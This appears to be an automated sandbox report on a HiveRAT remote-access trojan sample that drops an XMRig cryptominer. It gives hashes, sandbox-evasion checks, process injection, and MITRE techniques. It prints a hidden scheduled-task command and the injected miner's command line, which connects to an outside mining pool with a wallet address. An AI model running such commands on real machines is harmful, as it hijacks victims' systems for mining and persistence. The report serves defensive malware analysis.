hiverat | deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62

General

Target

deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
Size

7.6MB
MD5

efc5d47f6d5aa4dbd22cd109aa13ac30
SHA1

6427617947cca1dc78c5091dcb2c051ab8d5b949
SHA256

deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62
SHA512

0bf945e9f5f84ed82df9d6c160fb495b0f0e121f86e03ee3cd7acad1e0059d914fffde6ea8e3322015aa184792bbd0f9e9f85697ef9a1d06e172b693f839af29

Score

10^/10

hiverat xmrig evasion miner rat stealer

Malware Config

Signatures

HiveRAT
HiveRAT is an improved version of FirebirdRAT with various capabilities.
rat stealer hiverat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

HiveRAT Payload 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4208-135-0x0000000000400000-0x0000000000A28000-memory.dmp	family_hiverat
behavioral2/memory/4208-137-0x0000000000400000-0x0000000000A28000-memory.dmp	family_hiverat
behavioral2/memory/4208-139-0x0000000000400000-0x0000000000A28000-memory.dmp	family_hiverat
behavioral2/memory/4208-140-0x0000000000400000-0x0000000000A28000-memory.dmp	family_hiverat
behavioral2/memory/4208-141-0x0000000000400000-0x0000000000A28000-memory.dmp	family_hiverat
behavioral2/memory/4208-142-0x0000000000400000-0x0000000000A28000-memory.dmp	family_hiverat
behavioral2/memory/4208-146-0x0000000000400000-0x0000000000A28000-memory.dmp	family_hiverat
behavioral2/memory/4208-150-0x0000000000400000-0x0000000000A28000-memory.dmp	family_hiverat
behavioral2/memory/4208-151-0x0000000000400000-0x0000000000A28000-memory.dmp	family_hiverat
behavioral2/memory/4208-152-0x0000000000400000-0x0000000000A28000-memory.dmp	family_hiverat

Looks for VirtualBox Guest Additions in registry 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3536-159-0x0000000000400000-0x0000000000888000-memory.dmp	xmrig
behavioral2/memory/3536-161-0x0000000000400000-0x0000000000888000-memory.dmp	xmrig
behavioral2/memory/3536-162-0x0000000000400000-0x0000000000888000-memory.dmp	xmrig

Looks for VMWare Tools registry key 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exedeb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exedeb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

description	pid	process	target process
PID 4136 set thread context of 4208	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 set thread context of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2032 schtasks.exe

pid	process
2032	schtasks.exe

Modifies registry class 1 IoCs

Processes:

deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

pid	process
4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

pid process

4208 deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

pid	process
4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exedeb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

description	pid	process
Token: SeDebugPrivilege	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
Token: SeDebugPrivilege	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exedeb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe

C:\Users\Admin\AppData\Local\Temp\deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
"C:\Users\Admin\AppData\Local\Temp\deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe"
1⤵
- Checks BIOS information in registry
- Checks computer location settings
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4136
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iuvFUtslgAL" /XML "C:\Users\Admin\AppData\Local\Temp\tmpAC2E.tmp"
  2⤵
  - Creates scheduled task(s)
  PID:2032
- C:\Users\Admin\AppData\Local\Temp\deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
  "{path}"
  2⤵
  PID:4164
- C:\Users\Admin\AppData\Local\Temp\deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
  "{path}"
  2⤵
  - Checks computer location settings
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4208
- - C:\Users\Admin\AppData\Local\Temp\deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
    "C:\Users\Admin\AppData\Local\Temp\deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe" -a cryptonight --url=http://xmrpool.eu:5555/ --userpass=44AZAavMaLRjQzY6RS8mXwUBKGoPa62Yb8gVx89rZ1bHN1uqKvqW9Q13k86Pf4ve1a37XUa23btkeJckxSfKfnJqBd6fAiM:X --max-cpu-usage=65
    3⤵
    PID:3536
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"
    3⤵
    PID:3568

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Virtualization/Sandbox Evasion

2

T1497

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

4

T1082

Virtualization/Sandbox Evasion

2

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Execution5.vbs

Filesize
563B

MD5
7dff540cd392d0b313d4ed0d55fafdef

SHA1
2da23e76c1afeb89396f85bfa0c7be638497c4f7

SHA256
eb5134b02d9aea8fabad254943009a3c837410b1693d6dee7af1dcb22fbccb45

SHA512
c613ec4e7d99640681be3a7ccbec63b6070dc974307889ba86911967576b34b5bb61e6ab188b85344f0a2dd24c0468ae141ade1a3af6efedec196f846b0a71ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAC2E.tmp

Filesize
1KB

MD5
60b614fb96e53a20a89b91c276985b45

SHA1
fbe7825eb2481e7dbac2943cf2a2f8b919d00ad5

SHA256
060a9e81131f38a4af8d8da06ea630efb6fcabe30b46df4818dd909b86f5bae2

SHA512
82d4fea144e25f692d386f8074ffae014fe35afb5e3675ae6ad3531e38fedf095e12dce4765789feed347628b4e33020860426ddb62b6b361d50fdd0a8f3bdbe

Download Submit
memory/2032-131-0x0000000000000000-mapping.dmp

Download
memory/3536-162-0x0000000000400000-0x0000000000888000-memory.dmp

Filesize
4.5MB

Download
memory/3536-161-0x0000000000400000-0x0000000000888000-memory.dmp

Filesize
4.5MB

Download
memory/3536-159-0x0000000000400000-0x0000000000888000-memory.dmp

Filesize
4.5MB

Download
memory/3536-158-0x0000000000000000-mapping.dmp

Download
memory/3568-163-0x0000000000000000-mapping.dmp

Download
memory/4136-130-0x0000000075520000-0x0000000075AD1000-memory.dmp

Filesize
5.7MB

Download
memory/4164-133-0x0000000000000000-mapping.dmp

Download
memory/4208-142-0x0000000000400000-0x0000000000A28000-memory.dmp

Filesize
6.2MB

Download
memory/4208-146-0x0000000000400000-0x0000000000A28000-memory.dmp

Filesize
6.2MB

Download
memory/4208-147-0x0000000075520000-0x0000000075AD1000-memory.dmp

Filesize
5.7MB

Download
memory/4208-150-0x0000000000400000-0x0000000000A28000-memory.dmp

Filesize
6.2MB

Download
memory/4208-151-0x0000000000400000-0x0000000000A28000-memory.dmp

Filesize
6.2MB

Download
memory/4208-152-0x0000000000400000-0x0000000000A28000-memory.dmp

Filesize
6.2MB

Download
memory/4208-141-0x0000000000400000-0x0000000000A28000-memory.dmp

Filesize
6.2MB

Download
memory/4208-140-0x0000000000400000-0x0000000000A28000-memory.dmp

Filesize
6.2MB

Download
memory/4208-139-0x0000000000400000-0x0000000000A28000-memory.dmp

Filesize
6.2MB

Download
memory/4208-137-0x0000000000400000-0x0000000000A28000-memory.dmp

Filesize
6.2MB

Download
memory/4208-135-0x0000000000400000-0x0000000000A28000-memory.dmp

Filesize
6.2MB

Download
memory/4208-134-0x0000000000000000-mapping.dmp

Download

description	pid	process	target process
PID 4136 wrote to memory of 2032	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	schtasks.exe
PID 4136 wrote to memory of 2032	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	schtasks.exe
PID 4136 wrote to memory of 2032	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	schtasks.exe
PID 4136 wrote to memory of 4164	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4136 wrote to memory of 4164	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4136 wrote to memory of 4164	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4136 wrote to memory of 4208	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4136 wrote to memory of 4208	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4136 wrote to memory of 4208	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4136 wrote to memory of 4208	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4136 wrote to memory of 4208	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4136 wrote to memory of 4208	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4136 wrote to memory of 4208	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4136 wrote to memory of 4208	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4136 wrote to memory of 4208	4136	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3536	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe
PID 4208 wrote to memory of 3568	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	WScript.exe
PID 4208 wrote to memory of 3568	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	WScript.exe
PID 4208 wrote to memory of 3568	4208	deb4b809f9360df97d5991701bb4ce8d6f0a2b929e1459ea509299b3bfa65d62.exe	WScript.exe

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads